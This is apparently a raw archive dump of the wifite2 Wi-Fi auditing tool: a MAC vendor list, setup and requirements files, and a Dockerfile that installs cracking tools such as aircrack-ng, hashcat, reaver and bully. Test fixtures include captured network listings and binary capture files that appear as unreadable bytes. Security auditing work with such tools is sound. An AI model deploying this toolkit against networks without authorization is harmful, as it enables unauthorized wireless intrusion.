OCEANIX INC. 70B3D5059 Pro-Digital Projetos Eletronicos Ltda 70B3D5152 Xped Corporation Pty Ltd 70B3D59BA ATIM Radiocommunication 70B3D5E02 YEHL & JORDAN LLC 70B3D54B6 VEILUX INC. 70B3D5647 KZTA 70B3D5D51 Azcom Technology S.r.l. 70B3D58A6 CRDE 70B3D5B05 E-PLUS TECHNOLOGY CO., LTD 70B3D5EF6 CHARGELIB 70B3D5929 OutSys 70B3D5214 signalparser 70B3D53CC TerOpta Ltd 70B3D53C6 ACD Elekronik GmbH 70B3D5B6D Movis 70B3D52EF IEM SA 70B3D5794 Shadin Avionics 70B3D5B40 Wuhan Xingtuxinke ELectronic Co.,Ltd 70B3D5BAB Axotec Technologies GmbH 70B3D576E Grupo Epelsa S.L. 70B3D5F6E Streambox Inc 70B3D5D76 attocube systems AG 70B3D5AE0 AnyComm.Co.,Ltd. 70B3D5001 SOREDI touch systems GmbH 70B3D578E effectas GmbH 70B3D5266 Spectra Displays Ltd 70B3D5AE2 Wartsila Voyage Limited 70B3D516E Jemac Sweden AB 70B3D5494 Schildknecht AG 70B3D59F3 IEEE Registration Authority 70B3D5E93 ECON Technology Co.Ltd 70B3D54BD Boulder Amplifiers, Inc. 70B3D57EB Xerox International Partners 70B3D51E0 TOPROOTTechnology Corp. Ltd. 70B3D5439 TriLED 70B3D58A0 DM RADIOCOM 70B3D54D1 Contraves Advanced Devices Sdn. Bhd. 70B3D5D59 WyreStorm Technologies Ltd 70B3D514F Mobile Devices Unlimited 70B3D5D74 Sandia National Laboratories 70B3D537F IDS Innomic GmbH 70B3D5100 Gupsy GmbH 70B3D584E Chromalox, Inc. 70B3D5EE5 Beijing Hzhytech Technology Co.Ltd 70B3D504D Sicon srl 70B3D5BF1 Flashnet SRL 70B3D5DDF AeroVision Avionics, Inc. 70B3D5933 SARL S@TIS 70B3D52CE KDT 70B3D5A04 Galea Electric S.L. 70B3D5D12 FIDELTRONIK POLAND SP. Z O.O. 70B3D548E Allim System Co,.Ltd. 70B3D59ED Benchmark Electronics BV 70B3D5774 Micram Instruments Ltd 70B3D52EA Schneider Electric Motion 70B3D5DF7 ScopeSensor Oy 70B3D5D42 DSP DESIGN 70B3D543B Kalycito Infotech Private Limited 70B3D5C89 ARD 70B3D5852 NetBoxSC, LLC 70B3D532F Movidius SRL 70B3D57C1 Data Sciences International 70B3D5166 SERIAL IMAGE INC. 70B3D5595 PLR Prueftechnik Linke und Ruehe GmbH 70B3D5CD6 VideoRay LLC 70B3D58FF IMST GmbH 70B3D5A93 Mes Communication Co., Ltd 70B3D53D8 Abitsoftware, Ltd. 70B3D52E0 Peter Huber 70B3D54DE Oso Technologies, Inc. 70B3D5470 KITRON UAB 70B3D5F1E ATX NETWORKS LTD 70B3D57E4 C21 Systems Ltd 70B3D5DF9 Korea Plant Maintenance 70B3D500E Magosys Systems LTD 70B3D52D6 Kvazar LLC 70B3D508F DEUTA-WERKE GmbH 70B3D5D2D Evolute Systems Private Limited 70B3D5F93 Hella Gutmann Solutions GmbH 70B3D5E36 Guidance Navigation Limited 70B3D5CFD iLOQ Oy 70B3D587B Liquid Instruments Pty Ltd 70B3D5583 Ducommun Inc. 70B3D54D8 Versilis Inc. 70B3D5F8E Isabellenhütte Heusler Gmbh &Co KG 70B3D5995 LayTec AG 70B3D5336 Synaccess Networks Inc. 70B3D5D87 Zigen Corp 70B3D5C73 C.D.N.CORPORATION 70B3D5FBA Apogee Applied Research, Inc. 70B3D5870 bentrup Industriesteuerungen 70B3D57B7 LSB - LA SALLE BLANCHE 70B3D5AD6 Lemonade Lab Inc 70B3D5AFB Shanghai Tianhe Automation Instrumentation Co., Ltd. 70B3D5418 DEV Systemtechnik GmbH& Co KG 70B3D5775 Sonel S.A. 70B3D50DC Talleres de Escoriaza 70B3D57AE Exi Flow Measurement Ltd 70B3D548C Integrated Systems Engineering, Inc. 70B3D5AC9 Trinity Solutions LLC 70B3D5300 Novo DR Ltd. 70B3D5F2C Hengen Technologies GmbH 70B3D5AF3 New Japan Radio Co., Ltd 70B3D5A81 Sienda New Media Technologies GmbH 70B3D5D0D Logiwaste AB 70B3D51AF Teenage Engineering AB 70B3D5BDD CDR SRL 70B3D501C Kumu Networks 70B3D5DE8 Nation-E Ltd. 70B3D5A97 Bizwerks, LLC 70B3D57B8 SerEnergy A/S 70B3D513F Farmobile, LLC 70B3D5C3F Code Blue Corporation 70B3D5849 RF-Tuote Oy 70B3D5AA7 ATEME 70B3D53DB KST technology 70B3D5D7F ConectaIP Tecnologia S.L. 70B3D5DCF KLS Netherlands B.V. 70B3D5F92 TechOne 70B3D5A25 PulseTor LLC 70B3D5D1F Embsec AB 70B3D5A55 Embest Technology Co., Ltd 70B3D5959 Zulex International Co.,Ltd. 70B3D5220 Private 70B3D5A5B Christ Elektronik GmbH 70B3D5164 Tokyo Drawing Ltd. 70B3D5344 IHI Inspection & Instrumentation Co., Ltd. 70B3D5C61 JC HUNTER TECHNOLOGIES 70B3D5FF5 Prolan Process Control Co. 70B3D5327 Seneco A/S 70B3D5ECE COMM-connect A/S 70B3D5E92 FUJI DATA SYSTEM CO.,LTD. 70B3D5F8C EUROPEAN ADVANCED TECHNOLOGIES 70B3D5F2B SENSYS GmbH 70B3D50C0 Molu Technology Inc., LTD. 70B3D5BC6 Hatteland Display AS 70B3D53DF MultiDyne 70B3D5BA4 EIWA GIKEN INC. 70B3D53B8 nVideon, Inc. 70B3D5E4C IAI-Israel Aerospace Industries MBT 70B3D50B3 Reonix Automation 70B3D53CE Aditec GmbH 70B3D5362 Asiga 70B3D56F2 P&C Micro's Pty Ltd 70B3D545E eSOL Co.,Ltd. 70B3D5DC5 Excel Medical Electronics LLC 70B3D520C Siemens Healthcare Diagnostics 70B3D52E3 Meiknologic GmbH 70B3D5E26 FEITIAN CO.,LTD. 70B3D5E99 Advitronics telecom bv 70B3D5FC5 Eltwin A/S 70B3D5016 Guardian Controls International Ltd 70B3D55AA Chugoku Electric Manufacturing Co.,Inc 70B3D5FD3 AKIS technologies 70B3D5FA1 BBI Engineering, Inc. 70B3D560C IST ElektronikgesmbH 70B3D5AC8 Heartland.Data Inc. 70B3D5564 christmann informationstechnik + medien GmbH & Co. KG 70B3D5EF2 Kongsberg Intergrated Tactical Systems 70B3D53E1 Barnstormer Softworks 70B3D5819 «Intellect module» LLC 70B3D52DA Skywave Networks Private Limited 70B3D501D Weigl Elektronik & Mediaprojekte 70B3D59F4 Tband srl 70B3D540A Monroe Electronics, Inc. 70B3D53A8 JamHub Corp. 70B3D5052 Sudo Premium Engineering 70B3D551D Tecnint HTE SRL 70B3D5F61 Power Diagnostic Service 70B3D5433 Flexsolution APS 70B3D5F34 MacGray Services 70B3D5A0E Vetaphone A/S 70B3D5EDC J.D. Koftinoff Software, Ltd. 70B3D5B3D Inras GmbH 70B3D5139 Tunstall A/S 70B3D5183 Evco S.p.a. 70B3D53C2 Cellular Specialties, Inc. 001BC50B7 Autelis, LLC 001BC50BF TN Core Co.,Ltd. 001BC50C0 Digital Loggers, Inc. 001BC50AE Techlan Reti s.r.l. 001BC50A3 P A Network Laboratory Co.,Ltd 001BC509C S.I.C.E.S. srl 001BC5098 Cubic Systems, Inc. 001BC508D EUREK SRL 001BC5088 UAB Kitron 001BC5089 SIGNATURE CONTROL SYSTEMS, INC. 001BC5079 HPI High Pressure Instrumentation GmbH 001BC5081 WonATech Co., Ltd. 001BC506F LLC Emzior 001BC506E Two Dimensional Instruments, LLC 001BC506B Verified Energy, LLC. 001BC506C Luxcon System Limited 001BC5070 Siemens Industries, Inc, Retail & Commercial Systems 001BC5062 Sulaon Oy 001BC5065 Plair Media Inc. 001BC505D JSC Prominform 001BC5054 Private 001BC5040 OOO Actidata 001BC5039 EURESYS S.A. 001BC5035 RTLS Ltd. 001BC501D Rose + Herleth GbR 001BC501A ABA ELECTRONICS TECHNOLOGY CO.,LTD 001BC5013 Zamir Recognition Systems Ltd. 001BC5011 OOO NPP Mera 001BC5005 Private 001BC500B Private 001BC5006 TRIAX-HIRSCHMANN Multi-Media GmbH 001BC5007 Energy Aware Technology 8C1F6420C Shanghai Stairmed Technology Co.,ltd 8C1F64D81 Mitsubishi Electric India Pvt. Ltd. 8C1F643D0 TRIPLTEK 8C1F64C12 PHYSEC GmbH 8C1F648A8 Massachusetts Institute of Technology 8C1F64924 Magics Technologies 8C1F6449B Wartsila Voyage Limited 8C1F64880 MB connect line GmbH Fernwartungssysteme 70B3D54DA RADA Electronics Industries Ltd. 8C1F64D24 R3 IoT Ltd. 8C1F64501 QUISS GmbH 8C1F64A3F ViewSonic Corp 8C1F64C0D Abbott Diagnostics Technologies AS 8C1F64B68 All-Systems Electronics Pty Ltd 8C1F64C4A SGi Technology Group Ltd. 8C1F648B8 Wien Energie GmbH 8C1F640CA CLOUD TELECOM Inc. 8C1F64476 Clair Global Corporation 70B3D5F86 NxGen Comm LLC wifite2-2.7.0/requirements.txt0000644000175000017500000000011514437644461015727 0ustar sophiesophiechardet==5.1.0 pytest==7.3.1 scapy==2.5.0 argparse==1.4.0 setuptools==67.8.0 wifite2-2.7.0/wifite.py0000755000175000017500000000035714437644461014317 0ustar sophiesophie#!/usr/bin/env python # Note: This script runs Wifite from within a cloned git repo. # The script `bin/wifite` is designed to be run after installing (from /usr/sbin), not from the cwd. from wifite import __main__ __main__.entry_point() wifite2-2.7.0/runtests.sh0000755000175000017500000000005114437644461014670 0ustar sophiesophie#!/usr/bin/env bash pytest -s tests/ -v wifite2-2.7.0/setup.py0000644000175000017500000000317014437644461014161 0ustar sophiesophie#!/usr/bin/env python try: from setuptools import setup except: raise ImportError("setuptools is required to install wifite2") from wifite.config import Configuration setup( name='wifite', version=Configuration.version, author='kimocoder', author_email='christian@aircrack-ng.org', url='https://github.com/kimocoder/wifite2', tests_require=['pytest'], packages=[ 'wifite', 'wifite/attack', 'wifite/model', 'wifite/tools', 'wifite/util', ], data_files=[ ('share/dict', ['wordlist-probable.txt']) ], install_requires=['setuptools', 'scapy', 'chardet', 'argparse'], license='GNU GPLv2', scripts=['bin/wifite'], description='Wireless Network Auditor for Linux & Android', keywords="wifite capture packets monitor inject aircrack", # long_description=open('README.md').read(), long_description='''Wireless Network Auditor for Linux & Android. Sniff, Injects and Cracks WEP, WPA/2, and WPS encrypted networks. Depends on Aircrack-ng Suite, Tshark (from Wireshark), and various other external tools.''', classifiers=[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.4", "Programming Language :: Python :: 3.5", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", ] ) wifite2-2.7.0/Dockerfile0000644000175000017500000000506714437644461014450 0ustar sophiesophieFROM python:3.12-rc-slim ENV DEBIAN_FRONTEND noninteractive ENV HASHCAT_VERSION hashcat-6.2.6 ENV HASHCAT_UTILS_VERSION 1.9 # Install requirements FROM debian:bookworm RUN apt update && apt upgrade -y RUN apt install clang ca-certificates gcc openssl make kmod nano wget p7zip build-essential libsqlite3-dev libpcap0.8-dev libpcap-dev sqlite3 pkg-config libnl-genl-3-dev libssl-dev net-tools iw ethtool usbutils pciutils wireless-tools git curl wget unzip macchanger tshark -y RUN apt build-dep aircrack-ng -y # Install Aircrack from Source RUN wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz RUN tar xzvf aircrack-ng-1.7.tar.gz WORKDIR /aircrack-ng-1.7/ RUN autoreconf -i RUN ./configure --with-experimental RUN make RUN make install RUN airodump-ng-oui-update # Workdir / WORKDIR / # Install wps-pixie RUN git clone https://github.com/wiire/pixiewps WORKDIR /pixiewps/ RUN make RUN make install # Workdir / WORKDIR / # Install hcxdump RUN git clone https://github.com/ZerBea/hcxdumptool.git WORKDIR /hcxdumptool/ RUN make RUN make install # Workdir / WORKDIR / # Install hcxtools RUN git clone https://github.com/ZerBea/hcxtools.git WORKDIR /hcxtools/ RUN make RUN make install # Workdir / WORKDIR / # Install bully RUN git clone https://github.com/kimocoder/bully WORKDIR /bully/src/ RUN make RUN make install # Workdir / WORKDIR / # Install and configure hashcat RUN mkdir /hashcat # Install and configure hashcat: it's either the latest release or in legacy files RUN cd /hashcat && \ wget --no-check-certificate https://hashcat.net/files/${HASHCAT_VERSION}.7z && \ 7zr x ${HASHCAT_VERSION}.7z && \ rm ${HASHCAT_VERSION}.7z RUN cd /hashcat && \ wget https://github.com/hashcat/hashcat-utils/releases/download/v${HASHCAT_UTILS_VERSION}/hashcat-utils-${HASHCAT_UTILS_VERSION}.7z && \ 7zr x hashcat-utils-${HASHCAT_UTILS_VERSION}.7z && \ rm hashcat-utils-${HASHCAT_UTILS_VERSION}.7z # Add link for binary RUN ln -s /hashcat/${HASHCAT_VERSION}/hashcat64.bin /usr/bin/hashcat RUN ln -s /hashcat/hashcat-utils-${HASHCAT_UTILS_VERSION}/bin/cap2hccapx.bin /usr/bin/cap2hccapx # Workdir / WORKDIR / # Install reaver RUN git clone https://github.com/t6x/reaver-wps-fork-t6x WORKDIR /reaver-wps-fork-t6x/src/ RUN ./configure RUN make RUN make install # Workdir / WORKDIR / # Install cowpatty RUN git clone https://github.com/joswr1ght/cowpatty WORKDIR /cowpatty/ RUN make # Workdir / WORKDIR / # Install wifite RUN git clone https://github.com/kimocoder/wifite2.git RUN chmod -R 777 /wifite2/ WORKDIR /wifite2/ RUN apt install rfkill -y ENTRYPOINT ["/bin/bash"] wifite2-2.7.0/tests/0000755000175000017500000000000014437644461013610 5ustar sophiesophiewifite2-2.7.0/tests/pytest.ini0000644000175000017500000000017114437644461015640 0ustar sophiesophie[pytest] filterwarnings = error ignore::UserWarning ignore:function ham\(\) is deprecated:DeprecationWarning wifite2-2.7.0/tests/files/0000755000175000017500000000000014437644461014712 5ustar sophiesophiewifite2-2.7.0/tests/files/airodump.csv0000644000175000017500000001243514437644461017254 0ustar sophiesophie BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key 78:24:AF:D5:29:98, 2015-05-30 11:28:44, 2015-05-30 11:28:44, 6, -1, WPA, , , -73, 0, 1, 0. 0. 0. 0, 0, , 00:13:10:33:A6:56, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA, TKIP,PSK, -71, 7, 0, 0. 0. 0. 0, 11, orangefloss, D8:50:E6:D7:22:95, 2015-05-30 11:28:43, 2015-05-30 11:28:43, -1, -1, , , , -70, 0, 0, 0. 0. 0. 0, 0, , F0:99:BF:0A:B5:B0, 2015-05-30 11:28:45, 2015-05-30 11:28:48, 6, 54, WPA2, CCMP,PSK, -70, 3, 0, 0. 0. 0. 0, 22, Ingham's Wi-Fi Network, 60:02:92:BC:08:00, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2 WPA, CCMP TKIP,PSK, -68, 17, 0, 0. 0. 0. 0, 13, HOME-89B5-2.4, 00:25:BC:8B:24:95, 2015-05-30 11:28:44, 2015-05-30 11:28:44, 6, 54, WPA2 WPA, CCMP TKIP,PSK, -68, 1, 0, 0. 0. 0. 0, 8, atlantis, 60:02:92:BC:08:02, 2015-05-30 11:28:44, 2015-05-30 11:28:49, 6, 54, OPN, , , -68, 5, 0, 0. 0. 0. 0, 11, xfinitywifi, 00:23:69:BA:6D:F0, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2 WPA, CCMP TKIP,PSK, -67, 21, 0, 0. 0. 0. 0, 15, Pine Lake Girl2, 46:32:C8:5C:0E:3D, 2015-05-30 11:28:44, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -67, 6, 0, 0. 0. 0. 0, 12, \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00, 44:32:C8:5C:0E:3C, 2015-05-30 11:28:44, 2015-05-30 11:28:48, 6, 54, WPA2 WPA, CCMP TKIP,PSK, -67, 5, 3, 0. 0. 0. 0, 9, HOME-0E3C, 60:02:92:BC:08:01, 2015-05-30 11:28:44, 2015-05-30 11:28:49, 6, 54, WPA2 WPA, CCMP TKIP,PSK, -69, 14, 0, 0. 0. 0. 0, 0, , CC:A4:62:E8:E5:F0, 2015-05-30 11:28:44, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP TKIP,PSK, -67, 8, 0, 0. 0. 0. 0, 9, HOME-E5F2, C2:A4:62:E8:E5:F0, 2015-05-30 11:28:44, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -65, 13, 0, 0. 0. 0. 0, 0, , C6:A4:62:E8:E5:F0, 2015-05-30 11:28:45, 2015-05-30 11:28:50, 6, 54, OPN, , , -65, 14, 0, 0. 0. 0. 0, 11, xfinitywifi, F0:99:BF:05:20:64, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -62, 30, 0, 0. 0. 0. 0, 4, JJML, F2:64:20:05:BF:90, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -62, 23, 0, 0. 0. 0. 0, 9, JJMLGuest, 90:84:0D:DA:A8:87, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -62, 33, 5, 0. 0. 0. 0, 10, Rolston123, 10:0D:7F:8C:C1:FB, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -62, 12, 0, 0. 0. 0. 0, 12, The Internet, 00:00:00:00:00:00, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WEP, WEP, , -57, 138, 0, 0. 0. 0. 0, 0, , 00:1D:D5:9B:11:00, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP TKIP,PSK, -52, 32, 6, 0. 0. 0. 0, 9, HOME-1102, 00:24:7B:AB:5C:EE, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2 WPA, CCMP TKIP,PSK, -55, 16, 25, 0. 0. 0. 0, 11, myqwest0445, 02:1D:D5:9B:11:00, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -53, 41, 0, 0. 0. 0. 0, 0, , 06:1D:D5:9B:11:00, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, OPN, , , -53, 56, 0, 0. 0. 0. 0, 9, 这种情威灵顿酒店À, 00:F7:6F:CD:B2:2A, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -48, 44, 0, 0. 0. 0. 0, 13, im human 2015, 30:85:A9:39:D2:18, 2015-05-30 11:28:43, 2015-05-30 11:28:50, 6, 54, WPA2, CCMP,PSK, -21, 44, 4, 0. 0. 0. 0, 32, Uncle Router's Gigabit LAN Party, 00:0E:58:FA:7C:61, 2015-05-30 11:28:44, 2015-05-30 11:28:49, 6, -1, WPA, , , -1, 0, 57, 0. 0. 0. 0, 0, , 00:0E:58:F8:0B:B5, 2015-05-30 11:28:44, 2015-05-30 11:28:48, 6, -1, WPA, , , -1, 0, 59, 0. 0. 0. 0, 0, , 28:01:00:00:D0:00, 2015-05-30 11:28:44, 2015-05-30 11:28:44, 6, -1, , , , -1, 0, 0, 0. 0. 0. 0, 0, , 00:0E:58:E9:36:B3, 2015-05-30 11:28:44, 2015-05-30 11:28:48, 6, -1, WPA, , , -1, 0, 2, 0. 0. 0. 0, 0, , 05:00:40:00:BB:7C, 2015-05-30 11:28:50, 2015-05-30 11:28:50, -1, -1, , , , -1, 0, 0, 0. 0. 0. 0, 0, , Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs 3A:01:44:32:C8:5C, 2015-05-30 11:28:44, 2015-05-30 11:28:44, -69, 3, 28:01:00:00:D0:00, 54:35:30:23:62:8E, 2015-05-30 11:28:43, 2015-05-30 11:28:50, -64, 7, 00:1D:D5:9B:11:00,HOME-1102 10:40:F3:93:13:FA, 2015-05-30 11:28:44, 2015-05-30 11:28:48, -52, 4, 00:F7:6F:CD:B2:2A, 00:0E:58:FA:7C:61, 2015-05-30 11:28:45, 2015-05-30 11:28:50, -50, 6, 00:0E:58:E9:36:B3,Sonos_ynFI1HY4cF3gqPuljCuicmFZ66 00:0E:58:E9:36:B3, 2015-05-30 11:28:43, 2015-05-30 11:28:49, -51, 124, 00:0E:58:FA:7C:61,Sonos_ynFI1HY4cF3gqPuljCuicmFZ66 00:0E:58:F8:0B:B5, 2015-05-30 11:28:44, 2015-05-30 11:28:50, -48, 9, 00:0E:58:E9:36:B3,Sonos_ynFI1HY4cF3gqPuljCuicmFZ66 5C:93:A2:0D:3D:63, 2015-05-30 11:28:44, 2015-05-30 11:28:50, -1, 22, 00:24:7B:AB:5C:EE, wifite2-2.7.0/tests/files/handshake_exists.cap.stripped.tshark0000644000175000017500000000533414437644461024055 0ustar sophiesophie TM<+.TShark 1.10.2 (SVN Rev 51934 from /trunk-1.10)T i  %$0:a~ 0909uK-lς%=ǛhX⻦{&tgi4+x2 $0009a~ 09u i?+'w 5JCgvXr:.?B}Kq7O0 #%0:a~ 0909K-lς%=ǛhX⻦{&tghX⻦{&tgxkṤ$JtC8~/E uZx3wcqs<ղa7LfM@spH<%8 K%0009a~ 09_ +W.}L0 :lwx0909uK-lς%=ǛhX⻦{&tg %<^kESL0 :lwx0909uK-lς%=ǛhX⻦{&tg %<^kESM0 :lwx0909uK-lς%=ǛhX⻦{&tg %<^kESM0:lwx0909uK-lς%=ǛhX⻦{&tg %<^kES%M0 :lwx0909uK-lς%=ǛhX⻦{&tg %<^kES5M0 :lwx0909uK-lς%=ǛhX⻦{&tg %<^kESM0 :lwx0909uK-lς%=ǛhX⻦{&tg %<^kES0:lwx0909uK-lς%=ǛhX⻦{&tg %<^kESտ0:lwx0909K-lς%=ǛhX⻦{&tghX⻦{&tgaE6H׋c$8VzoHsFj8ҾHo2>Xc\Ѐ|ZpaA0@09lwx09_ ӞԸEYwifite2-2.7.0/tests/files/wep-uncrackable.ivs0000644000175000017500000046130314437644461020507 0ustar sophiesophiex+k:Test Router Please IgnoreڶD]@;O^,F#J3m|o}ޯc92NMnnR^Rn]$ڸ }b3u]qnojSNć#nMF< aKC]vLΈЀ$ڻ,4 *$R ĽSf..aJ\72hoչ wQ-$&D;52sIe`f kmun#szC6іx~jEtf;i$*D;&}6CF'#dW"|xF,OZh-WnTZR $ڿVeЅm r0W@ *6giWmN(6%^)Y 8s!@VťD SS!$-D;_{9-0RO_Òlc+'f) eڤZQU!/#qTIvFb&zg $V1# Lz%m)+*seX RH -̇b$䖋5C>+~_HEbqPc37c1q䔴L)@HsMiW/,R$*:v Ggc~<5MIj%/Ò81i 7'5@I:5 $BVcnKȃ|IAZ~ǼFK1dNv2 w+ˢ]"Ȣ m$J pͺ|H bAӸ,WL1fF՘8oHDG_Ncu`S$u'(!$/D;Jvs؀'`d6V :otGl`?v"*GO) W|z+qҌr$ Z5C[v6vy,D;*\tu.1. Fk@!Ixvг"D_h 53 2zjǒ$@wЈ_4rK8ܴ]D.\~"tSнOYYM$M+; R0D~ңukAf2;qqeR& .踙-?0NP$ID;[cy?T=[]K1HG3De#Sx[|`!c1ΤI&?4'5/y$)Ǡ߽YNm~XmjG`Bo8`wT(/ׅ2?ɪr҂ D$Oo|z#a)>wlRo NV90۝&[0ԝD+V!$'au)8o?1Ԁ2{֪$&M*LJ"S$ܒũNw%[ĐA|(ڲ2} 1ibE{^7$?=qQv xt[57)%zQH][|1zX&x'K$~B*u`%š޷ qtg&î^AP,l2jsYn|ˮk$G K=>u8ƺ.e#ܓMZac#s:>UrY/)-FO٠#UI)!_[Lz7s 0 Q;ptᄲ~NzZ$7\65\'>(sCΨwmgudYF 4E^N锶xgdo5$? 0$Mx_0\Mt:ʠ$o*hi@Xox-~`k޾_%'{%^pCH$[xw/>bW/U]2q{C KpP{)~́7Z`3$ȷк+ ^Nh4J˞+ ݳԳQ_M)?hI9=Ϯ\%$gD;:ǩ*nYgYHw_3w{;8ڂmw5x ) yRLj9\$IR^ ڄR^_|^sl5tRV,gnJԋ$(p$jD;'bFXz\|)@҆7xeN|*'l( 2ɵ? 2Z$qΒ+$kD;PZ;1ƖN!1RѭSK#;Ud8 S,&EeT0$(5e`S?u/mK]p}T%4EkQpREuj6^[yÝ~}Z9y&QJUA#SP_%RF>$%$ϤT JpPTJЖo{fWU MX!r( sۨ$$0eO$wD;OL9B :v..S K2eݞxWqi~߫FV^g5kc wl^R:$& ݓ-G\a] sƾψoJI}zW&tZIeD;j?|cC$'2s o:2sE] hhZܧ=I(#W_e`-&OP!R݀$D%$r\$)NrK +0Z lv'hm{:[lnz#m0YBb8ݘ߭Pdx?6N$-4X ~-Ȑx27GFm٦wz%멑J*zi-,Y$.FI 18o˄n1wo!%ta- NVxI8Ēs-KE%"RAhr$1X+WWC5`ת@XIPݺeT_OP vc]}7$2˦.wNBItG$qﵵ7fv{0{eUȎ[߼s'tu$3Wb -HPޅW0}n",?fcsً|Pz\LVv_,x$4B"yeг"ǟhΏF&n(?2Q *|9Njfg 6M Tqߟ(D$D; h9-yݾ{|Tgh4A6 gmL%[ܭ c4gd$9)ǧ}f 7a"'\%Mvih觾FK;qHh;$D;t<*nc ~Sbalb_4LE|NBAW'wPn[zK֚I$<zDԻدL |alCR 7'i {@| vs Fk g_mKlg$D;(`KGe=?NP7AcFL6Qsor]ԶGGzk?$>:Ą GRA9z[ byIF (:6p R7 x8q$?fH/,2\b TmG|5nh}x "%eX!+ VR*'$AK!ٵ`ǭ.cM;ObۡPx,<ļ.xЅr@J 0bs1O$BzO<ۈ;] iڄx1S ,/U9o27&*'G$Dq|W%уw?-<6Y]1IGn׺O&B@$=M$E]7 ,2P]ETˊ9_aP=HsMd@^:}Z|/s͐ц&H$FB~BrG_PE (vNCeM9)R5#TW7~$H㑪Cثȸ\A)zl&X,;"()Y~:@7pv]4$VHsa'Sݬs '!sL.<,Ȍ^^MM$`WIS]ȋ|%'{: @mp_.H<ހ@s9^4>AWC9b}{o쨑by$i;O2u@u02b^]\^@$4_*xƉ[O (J\mYb>mұ[$j“g&uտS/^AfKR!1 d?227Q{_qkoVK]=\$kfWw Sz:CA/"ҭ5>4AB%AOZ%O"Nb5늢ݍMw$lq.Ɖ2.tck1Q[eanS5f/0~0v=/œ㹴Kʌc@y $D;>dk\]Ϻ:vv1wǶg*w5}i.k =0&b^!3C$D;C@jǛIl{}@'6Wau`O (/\Υ8(z}8o21Fkv$n:XepSM JdH1+GnuRjWm),"@i|60~i&d Փ@׷$oz%z҂O("4^=ŅTm_M(@79 "5(6.4YGO$D;WLQy7pL0͞4<,zThcDt""ڪl`DxYϋ$p;CoP8МC(뀒Zf[8bN>~8Q35-pzQg$D;IGROꚜF"1/{D["[8;s; M̬w$D;bpã|r< -Xhp8}cz?T󻍦+^`$q6a2OW{9`qW",c=+m ;dy#j(_;6$r=-)Fd,YݾϞlT)/5-y.]"k|-s^/~*$sg${9yz-L 絼bQFt+CBNcd[ۨW79q3Hk>"Qk{ ;|$D;Đ?\n@DxĄI[ӡ3مJ@43غ0z&$t`W-/SIHUz$,&\줢P3#qM22i$v[ jjQ@bz=ل|s!14"A iuu7''L$D;"24I\Ҩ/cR~4)X)edq:vLX5x{uΆeq$x(dW6'Eb2H-S`HYN;a'|2[z frU}8($yJF겶?i̽۱y\r 52CЪQVQPk&JsU${)SI)s%dqEx=2ZM-oYT+B{Z7^bn$}ߐPiӏ9 ښgI;/wR-9{R+1:}\Qd|>ش$D;:66]F0wyځ$:o_qW64\}iltbW; oNO2$D;'Bu)8tDtቧj7MXV6B*{iGOx`o'ok: CA$~Kioȇ}]F~c3%MY@%Fvw%=r6jUݧ[$ۀO_Gבou`V9:r?Tr^MQ'.NX?9c IfdqE$D;j/gh7|aDO'}z(*ٝ\x/mC) ;0U$D;>,@xUr6&dˉK=`sQ ˆ 8߬ڋr4Nఛ^Lio$ہ(\xzcҁw0OPJ=Xk*!#x= ,#E^\r|_$ۄj-a1K;ZT.H۶׏") MT0&h*/wmrNj-x !%$ۅ4t2єh{:@g?0H́H\R fM(53KG6n-Iݝ j0#LCñ+$D;)zW4)KY|)Qj6Wx;"^|~bմOQi7KNP$D;fG`Mp]4 R0} ~ǤIe3DTwVF*rY++V$ۆHε5_~MO>?&gl46/q0;^_d:!V7ӛ ć$r$ۇ,l뮺NC lE"?L珼4d`l2屜|C1}>5lZB,uHL$ۈG0(>q"VX«Xţ! 7{ S}[xN&@ @"P(84$D; ])QNnZPCr˙lcRiν6'f{(~]gdLnY$ی5_ea8uՀ;vҜƼ1nqT#o~?2JX(ܪ,Y$ۍ*\91z KtϿRH!>MD 7d±*HE~Co$D;c`0S>&}^hVߴ_[*D:ɥ%|>Zx L_}=0gť$ێe:CMcR$+s. G P|zt_Г7Wۿ[$ۏ-爺C]]ZvnzYI#H5ztGl@-ex+iJcdEz$ېiЛoYo`+c8T^dNqi16?zP޾K3t@APO$ۑC;@ @e+hWMT7bt@ʧd{>H $۔ӊ.mv'_H K#|kN(5b+xz_V൫$ە] TWS+@r#`wfKcݣ{ nױ>֝%BCxMei$ۖD$hV+SDP-*~&t4)#V*L0YvZI';4$ۗsMh)xB9d9}vwYa~T\/챶qt4)`)8>D8 {`tdS5=أ7{jS,$۞Wuž#QGgʠy9+,P4.쳴E6c;5SRȱ$۟ TfSıΑ*}w׳=W0_Abr axt=$ۡuG>L\Gg!ѕEoЕ<5g\܏IAveAruw $ۢ(ֆoʶ #o¸010qڐR fPiZ=w.ັ$ۤ'jaX};@cTuixM}{Dw59B 